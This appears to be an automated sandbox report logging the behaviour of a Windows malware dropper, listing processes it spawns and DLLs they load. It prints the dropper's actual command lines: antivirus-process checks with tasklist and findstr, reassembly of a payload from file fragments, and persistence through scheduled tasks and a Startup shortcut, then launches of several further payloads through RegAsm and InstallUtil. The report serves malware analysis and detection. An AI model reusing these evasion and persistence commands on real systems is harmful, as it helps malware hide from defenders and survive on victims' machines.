Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File created: C:\Users\user\AppData\Local\Temp\nsgC9EA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit

Source: wfJfUGeGT3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\user\Desktop\wfJfUGeGT3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wfJfUGeGT3.exe "C:\Users\user\Desktop\wfJfUGeGT3.exe"
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
